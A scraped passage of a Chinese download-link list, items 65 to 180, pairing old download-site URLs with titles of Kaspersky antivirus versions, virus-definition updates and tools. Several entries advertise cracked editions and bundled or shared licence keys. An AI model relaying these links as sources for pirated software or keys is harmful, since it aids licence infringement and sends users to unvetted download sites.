www.syku.net/down/soft/4117.htm

65. 卡巴斯基(Kaspersky)反病毒软件 5.0.372 单机中文版

www.syku.net/down/soft/3643.htm

66. 卡巴斯基(AVP) v5.372 中文单机版

www.syku.net/down/soft/3132.htm

67. 卡巴斯基V5.0.20 简体中文单机注册版

www.syku.net/down/soft/2448.htm

68. 卡巴斯基个人安全套装 1.0.22

www.syku.net/down/soft/2150.htm

69. 卡巴斯基(AVP) v5.383 中文单机版

www.nbdown.net/ViewSoft-56.aspx

70. 卡巴斯基服务器版.for.win2003

www.ynllw.com/SoftView/SoftView_996.html

71. 卡巴斯基(Kaspersky) v5.0.390 Pro 官方简体中文版＋key 2007-07-14

www.ynllw.com/SoftView/SoftView_2964.html

72. 卡巴斯基®反病毒软件服务器专业版 4.5.104 完全绿化版

down.htcnc.net/Software/Catalog25/1203.html

73. 卡巴斯基Kaspersky纯DOS病毒库:2006.01.12 (硬盘+软盘+光盘+U盘+NTFS通用)

down.htcnc.net/Software/Catalog25/1241.html

74. 卡巴斯基(AVP) v5.227 中文单机版

www.600it.com/soft/3377.htm

75. Kaspersky 卡巴斯基 单机5.0.227简体中文版+KEY

www.bydown.com/Software/Catalog91/24.html

76. 卡巴斯基(Kaspersky) v5.0.390 Pro 官方简体中文版＋key 2007-07-14

down.htcnc.net/Software/Catalog25/344.html

77. Kaspersky（卡巴斯基） 5.0.388 官方中文专业版+个人版

www.lwdown.com/downinfo/1586.html

78. Kaspersky 卡巴斯基 V5.0.325 简体中文注册版 5.0.325

www.sooweb.net/Html/Soft/60.html

79. 卡巴斯基防火墙(Kaspersky Anti-Hacker ) 1.8.180 中文注册版

down.xxjp.org/Software/Catalog19/7865.html

80. 卡巴斯基反病毒官方中文单机版 5.0.388版 +key

down.xxjp.org/Software/Catalog21/5230.html

81. 卡巴斯基反病毒官方中文单机专业版 5.0.388版+key

down.xxjp.org/Software/Catalog21/5231.html

82. 卡巴斯基单机版5个Key和单机专业版2个Key

down.xxjp.org/Software/Catalog21/2835.html

83. 卡巴斯基Kaspersky纯DOS（软盘＋光盘＋U盘＋NTFS通用）版

down.xxjp.org/Software/Catalog21/8097.html

84. 卡巴斯基个人防火墙 1.7.130 英文版+繁体中文化模组

down.xxjp.org/Software/Catalog19/8082.html

85. 卡巴斯基个人专业 5.0.388 繁体中文版

down.xxjp.org/Software/Catalog21/8081.html

86. 卡巴斯基个人 5.0.388 繁体中文版

down.xxjp.org/Software/Catalog21/8079.html

87. 卡巴斯基(Kaspersky) v4.5 中文服务器版+key

down.xxjp.org/Software/Catalog21/7866.html

88. 卡巴斯基女孩清爽声提示音

down.xxjp.org/Software/Catalog21/5322.html

89. 卡巴斯基 V5.0.50 服务器key

down.xxjp.org/Software/Catalog21/5239.html

90. 卡巴斯基(Kaspersky)反病毒软件 v5.0.388 官方简体+5.0.390 Pro 完美升级

www.05sun.com/Software/Catalog60/19041.html

91. 卡巴斯基 (AVP) v5.227 中文单机版

www.a5d.com/SoftView/SoftView_157.asp

92. 卡巴斯基反病毒(Kaspersky Anti-Virus) 病毒更新库 Build 2005.04.

www.a5d.com/SoftView/SoftView_1138.asp

93. 卡巴斯基反病毒(Kaspersky Anti-Virus) 病毒更新库 Build 2005.05.31

www.a5d.com/SoftView/SoftView_1542.asp

94. 卡巴斯基服务器版(Kaspersky Anti-Virus for Server) 4.5

www.a5d.com/SoftView/SoftView_1874.asp

95. 卡巴斯基反病毒(Kaspersky Anti-Virus) 病毒更新库 Build 2005.06.28

www.a5d.com/SoftView/SoftView_2119.asp

96. 卡巴斯基反黑客软件 1.8.180

www.ttud.com/soft/2557.htm

97. 卡巴斯基反病毒软件单机 V5.0.20 简体中文版

www.ovo.com.cn/soft/6329.htm

98. 卡巴斯基(Kaspersky AntiVirus) V5.0.153

www.ovo.com.cn/soft/4214.htm

99. Kaspersky Anti-Virus Personal Pro（卡巴斯基个人专业版） 5.0.383 汉化版

www.ttud.com/soft/16.htm

100. 卡巴斯基个人安全套装 1.0.22

www.ttud.com/soft/625.htm   

101. 卡巴斯基反病毒(Kaspersky Anti-Virus) 病毒更新库 Build 2005.08.27

www.a5d.com/SoftView/SoftView_3358.asp   

102. 卡巴斯基反病毒单机版(Kaspersky Anti-Virus Personal) 2006 v6.0.13.195 Beta 英文测试版

www.a5d.com/SoftView/SoftView_3371.asp   

103. 卡巴斯基反病毒(Kaspersky Anti-Virus) 病毒更新库 Build 2005.09.

www.a5d.com/SoftView/SoftView_3562.asp   

104. 卡巴斯基反病毒(Kaspersky Anti-Virus) 病毒更新库 Build 2005.9.13

www.a5d.com/SoftView/SoftView_3674.asp   

105. 卡巴斯基网络安全套装 6.0.9.96 简体中文汉化版

www.ttud.com/soft/779.htm   

106. 卡巴斯基 5.0.20 中文专业版

www.ttud.com/soft/1001.htm   

107. 卡巴斯基(AVP) 5.0.388 专业版

www.ttud.com/soft/2070.htm   

108. 卡巴斯基反病毒软件 5.388 中文单机版

www.ttud.com/soft/2352.htm   

109. 卡巴斯基服务器版

www.mofang.net/software/Soft/40/77/2004/20040920493.html   

110. 卡巴斯基反病毒(Kaspersky Anti-Virus) 周病毒更新库 Build 2005.11.11

www.a5d.com/SoftView/SoftView_4710.asp   

111. 卡巴斯基反病毒(Kaspersky Anti-Virus) 周病毒更新库 Build 2005.11.03

www.a5d.com/SoftView/SoftView_4632.asp   

112. 卡巴斯基反病毒(Kaspersky Anti-Virus) 日病毒更新库 Build 2005.12

www.a5d.com/SoftView/SoftView_5389.asp   

113. 卡巴斯基(Kaspersky)百宝箱

www.downxia.com/downinfo/1595.html   

114. 卡巴斯基百宝箱 合集

xdowns.com/view_soft/1/9/kabasijibaibaoxiang heji.html

115. 卡巴斯基(Kaspersky) v5.0.390 Pro 纯绿色优化版

www.downxia.com/downinfo/1232.html   

卡巴斯基、江民、瑞星、金山、诺顿DOS版

www.pcsos.com.cn/article/article.php?aid=41659   

117. 卡巴斯基个人安全套装1.0.22 下载

www.pcsos.com.cn/article/article.php?aid=27092   

118. 卡巴斯基 2006 中文汉化单机版 6.0.9.96

www.pcsos.com.cn/article/article.php?aid=29774   

119. F-Prot、卡巴斯基、金山毒霸6、江民杀毒、McAfee 纯DOS(光盘+U盘+NFTS通用)版

www.pcsos.com.cn/article/article.php?aid=32068   


www.pcsos.com.cn/article/article.php?aid=34723   

121. Kaspersky 卡巴斯基 V5.0.325 简体中文注册版

www.pcsos.com.cn/article/article.php?aid=36661   

122. Kaspersky 卡巴斯基 中文破解windows服务器版 4.5

www.pcsos.com.cn/article/article.php?aid=36662   

123. 卡巴斯基、江民、瑞星、金山、诺顿DOS版

www.pcsos.com.cn/article/article.php?aid=39640   

124. 卡巴斯基(AVP)-最强最全 key+查看工具

www.downxia.com/downinfo/363.html   

125. 卡巴斯基木马探测器 V3.0

www.downxia.com/downinfo/1059.html   

126. 卡巴斯基服务器版 KAV for file server 5.0.62 + key

www.downxia.com/downinfo/916.html   

127. 卡巴斯基Kaspersky 2005 V10.23 (硬盘+软盘+光盘+U盘+NTFS通用)Dos版

www.downxia.com/downinfo/762.html   

128. 卡巴斯基(Kaspersky)V5.0.XXX全系列优化必备工具

www.downxia.com/downinfo/806.html   

129. 卡巴斯基反黑客软件官方中文版 v1.8.180 ＋一年授权

www.downxia.com/downinfo/639.html   

130. 卡巴斯基(Kaspersky) v5.0.390 Pro 官方简体中文版＋key 2007-07-14

www.downxia.com/downinfo/89.html   

131. 卡巴斯基(Kaspersky) v5.0.390 Pro 官方简体中文版＋key 2007-07-14

www.anxz.com/down/761.html   

132. 卡巴斯基(Kaspersky)V5.0.XXX全系列优化工具

www.anxz.com/down/1554.html   

133. 卡巴斯基反病毒软件服务器专业版 4.5.104 完全绿化版

www.anxz.com/down/1521.html   

134. 卡巴斯基反黑客软件 1.8.180 简体中文版

www.anxz.com/down/1491.html   

135. 卡巴斯基(Kaspersky)2006 汉化正式版

www.anxz.com/down/7.html   

136. 卡巴斯基防火墙(Kaspersky Anti-Hacker) 1.8 Build 180 汉化版

www.anxz.com/down/762.html   

137. 卡巴斯基网络安全套装 6.0.9.96

www.dorla.com/soft/583.htm   

138. 卡巴斯基(AVP) v5.227 中文单机版

www.dorla.com/soft/815.htm   

139. 卡巴斯基 5.0.20 中文专业版

www.dorla.com/soft/475.htm   

140. 卡巴斯基反病毒 Kaspersky Anti-Virus stand 5.0.227 简体中文注册版

www.gaoso.com/Soft/tools/sf/200412/6481.html   

141. Kaspersky Anti-Virus (卡巴斯基) 4.5简体中文企业版+破解

www.gaoso.com/Soft/tools/sf/200410/3424.html   

142. Kaspersky卡巴斯基 工具包Key+卸载工具+key查看器

www.gaoso.com/Soft/tools/sf/200410/3425.html   

143. 卡巴斯基 v5.0.142 简体中文版

www.gaoso.com/Soft/tools/sf/200410/3426.html   

144. 卡巴斯基反黑客软件 v1.8.180

www.piaodown.com/down/soft/22933.htm   

145. 卡巴斯基木马探测器 V3.0

www.6688cn.com/soft/203/326/4787.htm   

146. 卡巴斯基Kaspersky 纯DOS(光盘+U盘+NFTS通用)版 V20060106 免费版

www.6688cn.com/soft/202/311/1970.htm   

147. 卡巴斯基(Kaspersky Internet Security) 2006 6.0.9.96 汉化

www.adu520.net/SoftView/SoftView_521.html   

148. 卡巴斯基反病毒5.0.372社区会员专业版

www.softhy.net/soft/7659.htm   

149. Kaspersky Anti-Virus(AVP) Personal(卡巴斯基) V07.18 (软盘+光盘+U盘+NTFS通用)Dos版

www.softhy.net/soft/8029.htm   

150. 卡巴斯基(Kaspersky)百宝箱

www.softhy.net/soft/7378.htm   

151. 卡巴斯基防火墙(Kaspersky Anti-Hacker) 1.8 Build 180 汉化版

www.rzzyk.com/down/762.html   

152. 卡巴斯基(Kaspersky) v5.0.390 Pro 官方简体中文版＋key 2007-07-14

www.rzzyk.com/down/761.html   

153. 卡巴斯基反黑客软件 1.8.180 简体中文版

www.rzzyk.com/down/1491.html   

154. 卡巴斯基反病毒软件服务器专业版 4.5.104 完全绿化版

www.rzzyk.com/down/1521.html

155. 卡巴斯基(Kaspersky)V5.0.XXX全系列优化工具

www.rzzyk.com/down/1554.html   

156. 卡巴斯基(Kaspersky)2006 汉化正式版

www.rzzyk.com/down/7.html   

157. 卡巴斯基(Kaspersky)百宝箱（史上最全的合集 米粉别错过）

www.垃圾网站/downinfo/641.html   

158. Kaspersky(卡巴斯基) Internet Security 2006 v6.0.14 英文版

www.sanhaoonline.com/Download/html/2004/200407/20040713-6897.html   

159. 卡巴斯基Kaspersky50156per日文(日语)版ISO

www.lm8.cn/SoftView/SoftView_47.html   

160. 卡巴斯基反病毒 Kaspersky Anti-Virus stand 5.0.227 简体中文注册版

www.okget.com/Soft/Soft_2004.htm   

161. 卡巴斯基反病毒 Kaspersky Anti-Virus Personal Pro 5.0.383 汉化专业版

www.okget.com/Soft/Soft_2196.htm   

162. 卡巴斯基反病毒 Kaspersky Anti-Virus Workstations 5.0.157 汉化注册版

www.okget.com/Soft/Soft_650.htm   

163. 卡巴斯基反黑客软件 1.8.180 简体中文版

www.okget.com/Soft/Soft_949.htm   

164. 卡巴斯基反病毒软件 5.0.388 单机简体中文专业版

www.okget.com/Soft/Soft_84.htm   

165. 卡巴斯基(Kaspersky) v5.0.390 Pro 官方简体中文版＋key 2007-07-14

www.softhy.net/soft/13041.htm   

166. 卡巴斯基(AVP) v5.227 中文单机版

www.lm8.cn/SoftView/SoftView_22.html   

167. Kaspersky Anti-Virus Personal Pro(卡巴斯基) 5.0.383 正式汉化授权版

www.piaodown.com/down/soft/8229.htm   

168. Kaspersky(卡巴斯基) Anti-Hacker v1.8 Build 180 英文版

www.sanhaoonline.com/Download/html/2003/200302/20030221-2749.html   

169. Kaspersky(卡巴斯基) 反病毒专业版 v5.0.383

www.sanhaoonline.com/Download/html/2003/200302/20030203-1683.html   

170. Kaspersky(卡巴斯基) 反病毒病毒更新库 Build 2005.08.31

www.sanhaoonline.com/Download/html/2004/200404/20040404-5944.html   

171. Kaspersky(卡巴斯基) 反病毒单机版 v5.0.388 官方简体中文版

www.sanhaoonline.com/Download/html/2004/200405/20040510-6350.html   

172. 卡巴斯基(Kaspersky)V5.0.XXX全系列优化必备工具

www.gaoso.com/Soft/tools/sf/200511/27603.html   

173. 卡巴斯基反病毒软件单机版系列 5.0.383/5.0.372/5.0.227官方正式中文版

www.gaoso.com/Soft/tools/sf/200511/27616.html   

174. 卡巴斯基反病毒(Kaspersky Anti-Virus Pro) v5.0.390 简体中文版(附Keys)

www.ayxz.com/soft/853.htm   

175. 卡巴斯基安全套装2006 火热汉化版

www.softhy.net/soft/9710.htm   

176. 卡巴斯基(Kaspersky)V5.0.XXX全系列优化必备工具

www.softhy.net/soft/11605.htm   

177. 卡巴斯基反病毒服务器版(Kaspersky Anti-Virus for Server) v4.5.0.104 简体中文汉化版

www.lm8.cn/SoftView/SoftView_350.html   

178. 卡巴斯基(Kaspersky) v5.0.390 Pro 纯绿色优化版

www.softhy.net/soft/12559.htm   

179. Kaspersky Anti-Virus Personal(卡巴斯基) Personal Pro V5.0.388 正式版

download.pcsky.cn/downinfo/971.html

180. 卡巴斯基(AVP) v5.0.20 中文专业版

www.lm8.cn/SoftView/SoftView_565.html